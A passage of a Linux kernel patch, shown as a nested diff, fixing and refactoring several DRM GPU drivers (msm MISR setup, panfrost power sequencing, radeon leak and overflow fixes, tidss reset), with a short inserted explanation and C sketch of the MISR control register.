+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_crtc.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_crtc.c
+@@ -1,6 +1,6 @@
+ // SPDX-License-Identifier: GPL-2.0-only
+ /*
+- * Copyright (c) 2022 Qualcomm Innovation Center, Inc. All rights reserved.
++ * Copyright (c) 2022-2023 Qualcomm Innovation Center, Inc. All rights reserved.
+  * Copyright (c) 2014-2021 The Linux Foundation. All rights reserved.
+  * Copyright (C) 2013 Red Hat
+  * Author: Rob Clark <robdclark@gmail.com>
+@@ -124,7 +124,7 @@ static void dpu_crtc_setup_lm_misr(struct dpu_crtc_state *crtc_state)
+ 			continue;
+ 
+ 		/* Calculate MISR over 1 frame */
+-		m->hw_lm->ops.setup_misr(m->hw_lm, true, 1);
++		m->hw_lm->ops.setup_misr(m->hw_lm);
+ 	}
+ }
+ 
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c
+index 547f9f2b9fcb5..b0eb881f8af13 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder.c
+@@ -2,7 +2,7 @@
+ /*
+  * Copyright (C) 2013 Red Hat
+  * Copyright (c) 2014-2018, 2020-2021 The Linux Foundation. All rights reserved.
+- * Copyright (c) 2022 Qualcomm Innovation Center, Inc. All rights reserved.
++ * Copyright (c) 2022-2023 Qualcomm Innovation Center, Inc. All rights reserved.
+  *
+  * Author: Rob Clark <robdclark@gmail.com>
+  */
+@@ -257,7 +257,7 @@ void dpu_encoder_setup_misr(const struct drm_encoder *drm_enc)
+ 		if (!phys->hw_intf || !phys->hw_intf->ops.setup_misr)
+ 			continue;
+ 
+-		phys->hw_intf->ops.setup_misr(phys->hw_intf, true, 1);
++		phys->hw_intf->ops.setup_misr(phys->hw_intf);
+ 	}
+ }
+ 
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_intf.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_intf.c
+index b9dddf576c029..384558d2f9602 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_intf.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_intf.c
+@@ -1,6 +1,6 @@
+ // SPDX-License-Identifier: GPL-2.0-only
+ /*
+- * Copyright (c) 2022 Qualcomm Innovation Center, Inc. All rights reserved.
++ * Copyright (c) 2022-2023 Qualcomm Innovation Center, Inc. All rights reserved.
+  * Copyright (c) 2015-2018, The Linux Foundation. All rights reserved.
+  */
+ 
+@@ -322,9 +322,9 @@ static u32 dpu_hw_intf_get_line_count(struct dpu_hw_intf *intf)
+ 	return DPU_REG_READ(c, INTF_LINE_COUNT);
+ }
+ 
+-static void dpu_hw_intf_setup_misr(struct dpu_hw_intf *intf, bool enable, u32 frame_count)
++static void dpu_hw_intf_setup_misr(struct dpu_hw_intf *intf)
+ {
+-	dpu_hw_setup_misr(&intf->hw, INTF_MISR_CTRL, enable, frame_count);
++	dpu_hw_setup_misr(&intf->hw, INTF_MISR_CTRL, 0x1);
+ }
+ 
+ static int dpu_hw_intf_collect_misr(struct dpu_hw_intf *intf, u32 *misr_value)
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_intf.h b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_intf.h
+index 643dd10bc0306..e75339b96a1d2 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_intf.h
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_intf.h
+@@ -1,6 +1,6 @@
+ /* SPDX-License-Identifier: GPL-2.0-only */
+ /*
+- * Copyright (c) 2022 Qualcomm Innovation Center, Inc. All rights reserved.
++ * Copyright (c) 2022-2023 Qualcomm Innovation Center, Inc. All rights reserved.
+  * Copyright (c) 2015-2018, The Linux Foundation. All rights reserved.
+  */
+ 
+@@ -80,7 +80,7 @@ struct dpu_hw_intf_ops {
+ 	void (*bind_pingpong_blk)(struct dpu_hw_intf *intf,
+ 			bool enable,
+ 			const enum dpu_pingpong pp);
+-	void (*setup_misr)(struct dpu_hw_intf *intf, bool enable, u32 frame_count);
++	void (*setup_misr)(struct dpu_hw_intf *intf);
+ 	int (*collect_misr)(struct dpu_hw_intf *intf, u32 *misr_value);
+ };
+ 
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_lm.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_lm.c
+index f5120ea91edee..cc04fb979fb5c 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_lm.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_lm.c
+@@ -1,6 +1,6 @@
+ // SPDX-License-Identifier: GPL-2.0-only
+ /*
+- * Copyright (c) 2022 Qualcomm Innovation Center, Inc. All rights reserved.
++ * Copyright (c) 2022-2023 Qualcomm Innovation Center, Inc. All rights reserved.
+  * Copyright (c) 2015-2021, The Linux Foundation. All rights reserved.
+  */
+ 
+@@ -99,9 +99,9 @@ static void dpu_hw_lm_setup_border_color(struct dpu_hw_mixer *ctx,
+ 	}
+ }
+ 
+-static void dpu_hw_lm_setup_misr(struct dpu_hw_mixer *ctx, bool enable, u32 frame_count)
++static void dpu_hw_lm_setup_misr(struct dpu_hw_mixer *ctx)
+ {
+-	dpu_hw_setup_misr(&ctx->hw, LM_MISR_CTRL, enable, frame_count);
++	dpu_hw_setup_misr(&ctx->hw, LM_MISR_CTRL, 0x0);
+ }
+ 
+ static int dpu_hw_lm_collect_misr(struct dpu_hw_mixer *ctx, u32 *misr_value)
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_lm.h b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_lm.h
+index 652ddfdedec37..0a050eb247b99 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_lm.h
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_lm.h
+@@ -1,5 +1,6 @@
+ /* SPDX-License-Identifier: GPL-2.0-only */
+ /*
++ * Copyright (c) 2022-2023 Qualcomm Innovation Center, Inc. All rights reserved.
+  * Copyright (c) 2015-2021, The Linux Foundation. All rights reserved.
+  */
+ 
+@@ -57,7 +58,7 @@ struct dpu_hw_lm_ops {
+ 	/**
+ 	 * setup_misr: Enable/disable MISR
+ 	 */
+-	void (*setup_misr)(struct dpu_hw_mixer *ctx, bool enable, u32 frame_count);
++	void (*setup_misr)(struct dpu_hw_mixer *ctx);
+ 
+ 	/**
+ 	 * collect_misr: Read MISR signature
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_util.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_util.c
+index 8062228eada68..1b7439ae686a7 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_util.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_util.c
+@@ -1,6 +1,6 @@
+ // SPDX-License-Identifier: GPL-2.0-only
+ /*
+- * Copyright (c) 2022 Qualcomm Innovation Center, Inc. All rights reserved.
++ * Copyright (c) 2022-2023 Qualcomm Innovation Center, Inc. All rights reserved.
+  * Copyright (c) 2015-2018, The Linux Foundation. All rights reserved.
+  */
+ #define pr_fmt(fmt)	"[drm:%s:%d] " fmt, __func__, __LINE__
+@@ -450,9 +450,11 @@ u64 _dpu_hw_get_qos_lut(const struct dpu_qos_lut_tbl *tbl,
+ 	return 0;
+ }
+ 
++/*
++ * note: Aside from encoders, input_sel should be set to 0x0 by default
++ */
+ void dpu_hw_setup_misr(struct dpu_hw_blk_reg_map *c,
+-		u32 misr_ctrl_offset,
+-		bool enable, u32 frame_count)
++		u32 misr_ctrl_offset, u8 input_sel)
+ {
+ 	u32 config = 0;
+ 
+@@ -461,15 +463,9 @@ void dpu_hw_setup_misr(struct dpu_hw_blk_reg_map *c,
+ 	/* Clear old MISR value (in case it's read before a new value is calculated)*/
+ 	wmb();
+ 
+-	if (enable) {
+-		config = (frame_count & MISR_FRAME_COUNT_MASK) |
+-			MISR_CTRL_ENABLE | MISR_CTRL_FREE_RUN_MASK;
+-
+-		DPU_REG_WRITE(c, misr_ctrl_offset, config);
+-	} else {
+-		DPU_REG_WRITE(c, misr_ctrl_offset, 0);
+-	}
+-
++	config = MISR_FRAME_COUNT | MISR_CTRL_ENABLE | MISR_CTRL_FREE_RUN_MASK |
++		((input_sel & 0xF) << 24);
++	DPU_REG_WRITE(c, misr_ctrl_offset, config);
+ }
+ 
+ int dpu_hw_collect_misr(struct dpu_hw_blk_reg_map *c,
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_util.h b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_util.h
+index 27f4c39e35ab3..4ae2a434372cf 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_util.h
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_util.h
+@@ -1,6 +1,6 @@
+ /* SPDX-License-Identifier: GPL-2.0-only */
+ /*
+- * Copyright (c) 2022 Qualcomm Innovation Center, Inc. All rights reserved.
++ * Copyright (c) 2022-2023 Qualcomm Innovation Center, Inc. All rights reserved.
+  * Copyright (c) 2015-2021, The Linux Foundation. All rights reserved.
+  */
+ 
+@@ -13,7 +13,7 @@
+ #include "dpu_hw_catalog.h"
+ 
+ #define REG_MASK(n)                     ((BIT(n)) - 1)
+-#define MISR_FRAME_COUNT_MASK           0xFF
++#define MISR_FRAME_COUNT                0x1
+ #define MISR_CTRL_ENABLE                BIT(8)
+ #define MISR_CTRL_STATUS                BIT(9)
+ #define MISR_CTRL_STATUS_CLEAR          BIT(10)
+@@ -350,9 +350,7 @@ u64 _dpu_hw_get_qos_lut(const struct dpu_qos_lut_tbl *tbl,
+ 		u32 total_fl);
+ 
+ void dpu_hw_setup_misr(struct dpu_hw_blk_reg_map *c,
+-		u32 misr_ctrl_offset,
+-		bool enable,
+-		u32 frame_count);
++		u32 misr_ctrl_offset, u8 input_sel);
+ 
+ int dpu_hw_collect_misr(struct dpu_hw_blk_reg_map *c,
+ 		u32 misr_ctrl_offset,
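
After the MISR rework above, dpu_hw_setup_misr() always programs a one-frame, free-running MISR and only varies the input select (0x0 for layer mixers, 0x1 for interfaces). A sketch of the register word it builds; MISR_CTRL_FREE_RUN_MASK is assumed to be BIT(31) here:

#include <stdio.h>
#include <stdint.h>

#define BIT(n)			(1u << (n))
#define MISR_FRAME_COUNT	0x1
#define MISR_CTRL_ENABLE	BIT(8)
#define MISR_CTRL_FREE_RUN_MASK	BIT(31) /* assumed value */

/* Frame count fixed at 1, free-run enabled, input_sel in bits [27:24]. */
static uint32_t misr_ctrl_word(uint8_t input_sel)
{
	return MISR_FRAME_COUNT | MISR_CTRL_ENABLE | MISR_CTRL_FREE_RUN_MASK |
	       ((uint32_t)(input_sel & 0xF) << 24);
}

int main(void)
{
	printf("layer mixer: 0x%08x\n", misr_ctrl_word(0x0));
	printf("interface:   0x%08x\n", misr_ctrl_word(0x1));
	return 0;
}
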
+diff --git a/drivers/gpu/drm/msm/disp/mdp4/mdp4_crtc.c b/drivers/gpu/drm/msm/disp/mdp4/mdp4_crtc.c
+index 169f9de4a12a7..3100957225a70 100644
+--- a/drivers/gpu/drm/msm/disp/mdp4/mdp4_crtc.c
++++ b/drivers/gpu/drm/msm/disp/mdp4/mdp4_crtc.c
+@@ -269,6 +269,7 @@ static void mdp4_crtc_atomic_disable(struct drm_crtc *crtc,
+ {
+ 	struct mdp4_crtc *mdp4_crtc = to_mdp4_crtc(crtc);
+ 	struct mdp4_kms *mdp4_kms = get_kms(crtc);
++	unsigned long flags;
+ 
+ 	DBG("%s", mdp4_crtc->name);
+ 
+@@ -281,6 +282,14 @@ static void mdp4_crtc_atomic_disable(struct drm_crtc *crtc,
+ 	mdp_irq_unregister(&mdp4_kms->base, &mdp4_crtc->err);
+ 	mdp4_disable(mdp4_kms);
+ 
++	if (crtc->state->event && !crtc->state->active) {
++		WARN_ON(mdp4_crtc->event);
++		spin_lock_irqsave(&mdp4_kms->dev->event_lock, flags);
++		drm_crtc_send_vblank_event(crtc, crtc->state->event);
++		crtc->state->event = NULL;
++		spin_unlock_irqrestore(&mdp4_kms->dev->event_lock, flags);
++	}
++
+ 	mdp4_crtc->enabled = false;
+ }
+ 
+diff --git a/drivers/gpu/drm/msm/dsi/phy/dsi_phy.c b/drivers/gpu/drm/msm/dsi/phy/dsi_phy.c
+index 7fc0975cb8693..62bc3756f2e2b 100644
+--- a/drivers/gpu/drm/msm/dsi/phy/dsi_phy.c
++++ b/drivers/gpu/drm/msm/dsi/phy/dsi_phy.c
+@@ -512,7 +512,9 @@ static int dsi_phy_enable_resource(struct msm_dsi_phy *phy)
+ 	struct device *dev = &phy->pdev->dev;
+ 	int ret;
+ 
+-	pm_runtime_get_sync(dev);
++	ret = pm_runtime_resume_and_get(dev);
++	if (ret)
++		return ret;
+ 
+ 	ret = clk_prepare_enable(phy->ahb_clk);
+ 	if (ret) {
+diff --git a/drivers/gpu/drm/nouveau/nv04_fence.c b/drivers/gpu/drm/nouveau/nv04_fence.c
+index 5b71a5a5cd85c..cdbc75e3d1f66 100644
+--- a/drivers/gpu/drm/nouveau/nv04_fence.c
++++ b/drivers/gpu/drm/nouveau/nv04_fence.c
+@@ -39,7 +39,7 @@ struct nv04_fence_priv {
+ static int
+ nv04_fence_emit(struct nouveau_fence *fence)
+ {
+-	struct nvif_push *push = fence->channel->chan.push;
++	struct nvif_push *push = unrcu_pointer(fence->channel)->chan.push;
+ 	int ret = PUSH_WAIT(push, 2);
+ 	if (ret == 0) {
+ 		PUSH_NVSQ(push, NV_SW, 0x0150, fence->base.seqno);
+diff --git a/drivers/gpu/drm/omapdrm/omap_drv.c b/drivers/gpu/drm/omapdrm/omap_drv.c
+index eaf67b9e5f12b..5b6d1668f405c 100644
+--- a/drivers/gpu/drm/omapdrm/omap_drv.c
++++ b/drivers/gpu/drm/omapdrm/omap_drv.c
+@@ -68,7 +68,6 @@ static void omap_atomic_commit_tail(struct drm_atomic_state *old_state)
+ {
+ 	struct drm_device *dev = old_state->dev;
+ 	struct omap_drm_private *priv = dev->dev_private;
+-	bool fence_cookie = dma_fence_begin_signalling();
+ 
+ 	dispc_runtime_get(priv->dispc);
+ 
+@@ -91,6 +90,8 @@ static void omap_atomic_commit_tail(struct drm_atomic_state *old_state)
+ 		omap_atomic_wait_for_completion(dev, old_state);
+ 
+ 		drm_atomic_helper_commit_planes(dev, old_state, 0);
++
++		drm_atomic_helper_commit_hw_done(old_state);
+ 	} else {
+ 		/*
+ 		 * OMAP3 DSS seems to have issues with the work-around above,
+@@ -100,11 +101,9 @@ static void omap_atomic_commit_tail(struct drm_atomic_state *old_state)
+ 		drm_atomic_helper_commit_planes(dev, old_state, 0);
+ 
+ 		drm_atomic_helper_commit_modeset_enables(dev, old_state);
+-	}
+ 
+-	drm_atomic_helper_commit_hw_done(old_state);
+-
+-	dma_fence_end_signalling(fence_cookie);
++		drm_atomic_helper_commit_hw_done(old_state);
++	}
+ 
+ 	/*
+ 	 * Wait for completion of the page flips to ensure that old buffers
+diff --git a/drivers/gpu/drm/panel/panel-elida-kd35t133.c b/drivers/gpu/drm/panel/panel-elida-kd35t133.c
+index eee714cf3f490..3a7fc3ca6a6fe 100644
+--- a/drivers/gpu/drm/panel/panel-elida-kd35t133.c
++++ b/drivers/gpu/drm/panel/panel-elida-kd35t133.c
+@@ -112,6 +112,8 @@ static int kd35t133_unprepare(struct drm_panel *panel)
+ 		return ret;
+ 	}
+ 
++	gpiod_set_value_cansleep(ctx->reset_gpio, 1);
++
+ 	regulator_disable(ctx->iovcc);
+ 	regulator_disable(ctx->vdd);
+ 
+diff --git a/drivers/gpu/drm/panel/panel-sitronix-st7701.c b/drivers/gpu/drm/panel/panel-sitronix-st7701.c
+index 225b9884f61a9..54b28992db5d8 100644
+--- a/drivers/gpu/drm/panel/panel-sitronix-st7701.c
++++ b/drivers/gpu/drm/panel/panel-sitronix-st7701.c
+@@ -288,7 +288,7 @@ static void st7701_init_sequence(struct st7701 *st7701)
+ 		   FIELD_PREP(DSI_CMD2_BK1_PWRCTRL2_AVDD_MASK,
+ 			      DIV_ROUND_CLOSEST(desc->avdd_mv - 6200, 200)) |
+ 		   FIELD_PREP(DSI_CMD2_BK1_PWRCTRL2_AVCL_MASK,
+-			      DIV_ROUND_CLOSEST(-4400 + desc->avcl_mv, 200)));
++			      DIV_ROUND_CLOSEST(-4400 - desc->avcl_mv, 200)));
+ 
+ 	/* T2D = 0.2us * T2D[3:0] */
+ 	ST7701_DSI(st7701, DSI_CMD2_BK1_SPD1,
+diff --git a/drivers/gpu/drm/panfrost/panfrost_gpu.c b/drivers/gpu/drm/panfrost/panfrost_gpu.c
+index 6452e4e900dd7..55d2430485168 100644
+--- a/drivers/gpu/drm/panfrost/panfrost_gpu.c
++++ b/drivers/gpu/drm/panfrost/panfrost_gpu.c
+@@ -71,7 +71,12 @@ int panfrost_gpu_soft_reset(struct panfrost_device *pfdev)
+ 	}
+ 
+ 	gpu_write(pfdev, GPU_INT_CLEAR, GPU_IRQ_MASK_ALL);
+-	gpu_write(pfdev, GPU_INT_MASK, GPU_IRQ_MASK_ALL);
++
++	/* Only enable the interrupts we care about */
++	gpu_write(pfdev, GPU_INT_MASK,
++		  GPU_IRQ_MASK_ERROR |
++		  GPU_IRQ_PERFCNT_SAMPLE_COMPLETED |
++		  GPU_IRQ_CLEAN_CACHES_COMPLETED);
+ 
+ 	return 0;
+ }
+@@ -313,28 +318,38 @@ static void panfrost_gpu_init_features(struct panfrost_device *pfdev)
+ 		 pfdev->features.shader_present, pfdev->features.l2_present);
+ }
+ 
++static u64 panfrost_get_core_mask(struct panfrost_device *pfdev)
++{
++	u64 core_mask;
++
++	if (pfdev->features.l2_present == 1)
++		return U64_MAX;
++
++	/*
++	 * Only support one core group now.
++	 * ~(l2_present - 1) unsets all bits in l2_present except
++	 * the bottom bit. (l2_present - 2) has all the bits in
++	 * the first core group set. AND them together to generate
++	 * a mask of cores in the first core group.
++	 */
++	core_mask = ~(pfdev->features.l2_present - 1) &
++		     (pfdev->features.l2_present - 2);
++	dev_info_once(pfdev->dev, "using only 1st core group (%lu cores from %lu)\n",
++		      hweight64(core_mask),
++		      hweight64(pfdev->features.shader_present));
++
++	return core_mask;
++}
++
+ void panfrost_gpu_power_on(struct panfrost_device *pfdev)
+ {
+ 	int ret;
+ 	u32 val;
+-	u64 core_mask = U64_MAX;
++	u64 core_mask;
+ 
+ 	panfrost_gpu_init_quirks(pfdev);
++	core_mask = panfrost_get_core_mask(pfdev);
+ 
+-	if (pfdev->features.l2_present != 1) {
+-		/*
+-		 * Only support one core group now.
+-		 * ~(l2_present - 1) unsets all bits in l2_present except
+-		 * the bottom bit. (l2_present - 2) has all the bits in
+-		 * the first core group set. AND them together to generate
+-		 * a mask of cores in the first core group.
+-		 */
+-		core_mask = ~(pfdev->features.l2_present - 1) &
+-			     (pfdev->features.l2_present - 2);
+-		dev_info_once(pfdev->dev, "using only 1st core group (%lu cores from %lu)\n",
+-			      hweight64(core_mask),
+-			      hweight64(pfdev->features.shader_present));
+-	}
+ 	gpu_write(pfdev, L2_PWRON_LO, pfdev->features.l2_present & core_mask);
+ 	ret = readl_relaxed_poll_timeout(pfdev->iomem + L2_READY_LO,
+ 		val, val == (pfdev->features.l2_present & core_mask),
+@@ -359,9 +374,26 @@ void panfrost_gpu_power_on(struct panfrost_device *pfdev)
+ 
+ void panfrost_gpu_power_off(struct panfrost_device *pfdev)
+ {
+-	gpu_write(pfdev, TILER_PWROFF_LO, 0);
+-	gpu_write(pfdev, SHADER_PWROFF_LO, 0);
+-	gpu_write(pfdev, L2_PWROFF_LO, 0);
++	int ret;
++	u32 val;
++
++	gpu_write(pfdev, SHADER_PWROFF_LO, pfdev->features.shader_present);
++	ret = readl_relaxed_poll_timeout(pfdev->iomem + SHADER_PWRTRANS_LO,
++					 val, !val, 1, 1000);
++	if (ret)
++		dev_err(pfdev->dev, "shader power transition timeout");
++
++	gpu_write(pfdev, TILER_PWROFF_LO, pfdev->features.tiler_present);
++	ret = readl_relaxed_poll_timeout(pfdev->iomem + TILER_PWRTRANS_LO,
++					 val, !val, 1, 1000);
++	if (ret)
++		dev_err(pfdev->dev, "tiler power transition timeout");
++
++	gpu_write(pfdev, L2_PWROFF_LO, pfdev->features.l2_present);
++	ret = readl_poll_timeout(pfdev->iomem + L2_PWRTRANS_LO,
++				 val, !val, 0, 1000);
++	if (ret)
++		dev_err(pfdev->dev, "l2 power transition timeout");
+ }
+ 
+ int panfrost_gpu_init(struct panfrost_device *pfdev)
+diff --git a/drivers/gpu/drm/radeon/r100.c b/drivers/gpu/drm/radeon/r100.c
+index d4f09ecc3d221..f336b5b3b11f4 100644
+--- a/drivers/gpu/drm/radeon/r100.c
++++ b/drivers/gpu/drm/radeon/r100.c
+@@ -2321,7 +2321,7 @@ int r100_cs_track_check(struct radeon_device *rdev, struct r100_cs_track *track)
+ 	switch (prim_walk) {
+ 	case 1:
+ 		for (i = 0; i < track->num_arrays; i++) {
+-			size = track->arrays[i].esize * track->max_indx * 4;
++			size = track->arrays[i].esize * track->max_indx * 4UL;
+ 			if (track->arrays[i].robj == NULL) {
+ 				DRM_ERROR("(PW %u) Vertex array %u no buffer "
+ 					  "bound\n", prim_walk, i);
+@@ -2340,7 +2340,7 @@ int r100_cs_track_check(struct radeon_device *rdev, struct r100_cs_track *track)
+ 		break;
+ 	case 2:
+ 		for (i = 0; i < track->num_arrays; i++) {
+-			size = track->arrays[i].esize * (nverts - 1) * 4;
++			size = track->arrays[i].esize * (nverts - 1) * 4UL;
+ 			if (track->arrays[i].robj == NULL) {
+ 				DRM_ERROR("(PW %u) Vertex array %u no buffer "
+ 					  "bound\n", prim_walk, i);
+diff --git a/drivers/gpu/drm/radeon/r600_cs.c b/drivers/gpu/drm/radeon/r600_cs.c
+index 638f861af80fa..6cf54a747749d 100644
+--- a/drivers/gpu/drm/radeon/r600_cs.c
++++ b/drivers/gpu/drm/radeon/r600_cs.c
+@@ -1275,7 +1275,7 @@ static int r600_cs_check_reg(struct radeon_cs_parser *p, u32 reg, u32 idx)
+ 			return -EINVAL;
+ 		}
+ 		tmp = (reg - CB_COLOR0_BASE) / 4;
+-		track->cb_color_bo_offset[tmp] = radeon_get_ib_value(p, idx) << 8;
++		track->cb_color_bo_offset[tmp] = (u64)radeon_get_ib_value(p, idx) << 8;
+ 		ib[idx] += (u32)((reloc->gpu_offset >> 8) & 0xffffffff);
+ 		track->cb_color_base_last[tmp] = ib[idx];
+ 		track->cb_color_bo[tmp] = reloc->robj;
+@@ -1302,7 +1302,7 @@ static int r600_cs_check_reg(struct radeon_cs_parser *p, u32 reg, u32 idx)
+ 					"0x%04X\n", reg);
+ 			return -EINVAL;
+ 		}
+-		track->htile_offset = radeon_get_ib_value(p, idx) << 8;
++		track->htile_offset = (u64)radeon_get_ib_value(p, idx) << 8;
+ 		ib[idx] += (u32)((reloc->gpu_offset >> 8) & 0xffffffff);
+ 		track->htile_bo = reloc->robj;
+ 		track->db_dirty = true;
+diff --git a/drivers/gpu/drm/radeon/radeon_display.c b/drivers/gpu/drm/radeon/radeon_display.c
+index ca5598ae8bfcf..1814bb8e14f10 100644
+--- a/drivers/gpu/drm/radeon/radeon_display.c
++++ b/drivers/gpu/drm/radeon/radeon_display.c
+@@ -687,11 +687,16 @@ static void radeon_crtc_init(struct drm_device *dev, int index)
+ 	if (radeon_crtc == NULL)
+ 		return;
+ 
++	radeon_crtc->flip_queue = alloc_workqueue("radeon-crtc", WQ_HIGHPRI, 0);
++	if (!radeon_crtc->flip_queue) {
++		kfree(radeon_crtc);
++		return;
++	}
++
+ 	drm_crtc_init(dev, &radeon_crtc->base, &radeon_crtc_funcs);
+ 
+ 	drm_mode_crtc_set_gamma_size(&radeon_crtc->base, 256);
+ 	radeon_crtc->crtc_id = index;
+-	radeon_crtc->flip_queue = alloc_workqueue("radeon-crtc", WQ_HIGHPRI, 0);
+ 	rdev->mode_info.crtcs[index] = radeon_crtc;
+ 
+ 	if (rdev->family >= CHIP_BONAIRE) {
+diff --git a/drivers/gpu/drm/radeon/radeon_vm.c b/drivers/gpu/drm/radeon/radeon_vm.c
+index 987cabbf1318e..c38b4d5d6a14f 100644
+--- a/drivers/gpu/drm/radeon/radeon_vm.c
++++ b/drivers/gpu/drm/radeon/radeon_vm.c
+@@ -1204,13 +1204,17 @@ int radeon_vm_init(struct radeon_device *rdev, struct radeon_vm *vm)
+ 	r = radeon_bo_create(rdev, pd_size, align, true,
+ 			     RADEON_GEM_DOMAIN_VRAM, 0, NULL,
+ 			     NULL, &vm->page_directory);
+-	if (r)
++	if (r) {
++		kfree(vm->page_tables);
++		vm->page_tables = NULL;
+ 		return r;
+-
++	}
+ 	r = radeon_vm_clear_bo(rdev, vm->page_directory);
+ 	if (r) {
+ 		radeon_bo_unref(&vm->page_directory);
+ 		vm->page_directory = NULL;
++		kfree(vm->page_tables);
++		vm->page_tables = NULL;
+ 		return r;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/radeon/si.c b/drivers/gpu/drm/radeon/si.c
+index a91012447b56e..85e9cba49cecb 100644
+--- a/drivers/gpu/drm/radeon/si.c
++++ b/drivers/gpu/drm/radeon/si.c
+@@ -3611,6 +3611,10 @@ static int si_cp_start(struct radeon_device *rdev)
+ 	for (i = RADEON_RING_TYPE_GFX_INDEX; i <= CAYMAN_RING_TYPE_CP2_INDEX; ++i) {
+ 		ring = &rdev->ring[i];
+ 		r = radeon_ring_lock(rdev, ring, 2);
++		if (r) {
++			DRM_ERROR("radeon: cp failed to lock ring (%d).\n", r);
++			return r;
++		}
+ 
+ 		/* clear the compute context state */
+ 		radeon_ring_write(ring, PACKET3_COMPUTE(PACKET3_CLEAR_STATE, 0));
+diff --git a/drivers/gpu/drm/radeon/sumo_dpm.c b/drivers/gpu/drm/radeon/sumo_dpm.c
+index f74f381af05fd..d49c145db4370 100644
+--- a/drivers/gpu/drm/radeon/sumo_dpm.c
++++ b/drivers/gpu/drm/radeon/sumo_dpm.c
+@@ -1493,8 +1493,10 @@ static int sumo_parse_power_table(struct radeon_device *rdev)
+ 		non_clock_array_index = power_state->v2.nonClockInfoIndex;
+ 		non_clock_info = (struct _ATOM_PPLIB_NONCLOCK_INFO *)
+ 			&non_clock_info_array->nonClockInfo[non_clock_array_index];
+-		if (!rdev->pm.power_state[i].clock_info)
++		if (!rdev->pm.power_state[i].clock_info) {
++			kfree(rdev->pm.dpm.ps);
+ 			return -EINVAL;
++		}
+ 		ps = kzalloc(sizeof(struct sumo_ps), GFP_KERNEL);
+ 		if (ps == NULL) {
+ 			kfree(rdev->pm.dpm.ps);
+diff --git a/drivers/gpu/drm/radeon/trinity_dpm.c b/drivers/gpu/drm/radeon/trinity_dpm.c
+index 08ea1c864cb23..ef1cc7bad20a7 100644
+--- a/drivers/gpu/drm/radeon/trinity_dpm.c
++++ b/drivers/gpu/drm/radeon/trinity_dpm.c
+@@ -1726,8 +1726,10 @@ static int trinity_parse_power_table(struct radeon_device *rdev)
+ 		non_clock_array_index = power_state->v2.nonClockInfoIndex;
+ 		non_clock_info = (struct _ATOM_PPLIB_NONCLOCK_INFO *)
+ 			&non_clock_info_array->nonClockInfo[non_clock_array_index];
+-		if (!rdev->pm.power_state[i].clock_info)
++		if (!rdev->pm.power_state[i].clock_info) {
++			kfree(rdev->pm.dpm.ps);
+ 			return -EINVAL;
++		}
+ 		ps = kzalloc(sizeof(struct sumo_ps), GFP_KERNEL);
+ 		if (ps == NULL) {
+ 			kfree(rdev->pm.dpm.ps);
+diff --git a/drivers/gpu/drm/tidss/tidss_dispc.c b/drivers/gpu/drm/tidss/tidss_dispc.c
+index 16301bdfead12..95b75236fe5e8 100644
+--- a/drivers/gpu/drm/tidss/tidss_dispc.c
++++ b/drivers/gpu/drm/tidss/tidss_dispc.c
+@@ -2653,18 +2653,69 @@ static void dispc_init_errata(struct dispc_device *dispc)
+ 	}
+ }
+ 
+-static void dispc_softreset(struct dispc_device *dispc)
++static int dispc_softreset(struct dispc_device *dispc)
+ {
+ 	u32 val;
+ 	int ret = 0;
+ 
++	/* K2G display controller does not support soft reset */
++	if (dispc->feat->subrev == DISPC_K2G)
++		return 0;
++
+ 	/* Soft reset */
+ 	REG_FLD_MOD(dispc, DSS_SYSCONFIG, 1, 1, 1);
+ 	/* Wait for reset to complete */
+ 	ret = readl_poll_timeout(dispc->base_common + DSS_SYSSTATUS,
+ 				 val, val & 1, 100, 5000);
++	if (ret) {
++		dev_err(dispc->dev, "failed to reset dispc\n");
++		return ret;
++	}
++
++	return 0;
++}
++
++static int dispc_init_hw(struct dispc_device *dispc)
++{
++	struct device *dev = dispc->dev;
++	int ret;
++
++	ret = pm_runtime_set_active(dev);
++	if (ret) {
++		dev_err(dev, "Failed to set DSS PM to active\n");
++		return ret;
++	}
++
++	ret = clk_prepare_enable(dispc->fclk);
++	if (ret) {
++		dev_err(dev, "Failed to enable DSS fclk\n");
++		goto err_runtime_suspend;
++	}
++
++	ret = dispc_softreset(dispc);
+ 	if (ret)
+-		dev_warn(dispc->dev, "failed to reset dispc\n");
++		goto err_clk_disable;
++
++	clk_disable_unprepare(dispc->fclk);
++	ret = pm_runtime_set_suspended(dev);
++	if (ret) {
++		dev_err(dev, "Failed to set DSS PM to suspended\n");
++		return ret;
++	}
++
++	return 0;
++
++err_clk_disable:
++	clk_disable_unprepare(dispc->fclk);
++
++err_runtime_suspend:
++	ret = pm_runtime_set_suspended(dev);
++	if (ret) {
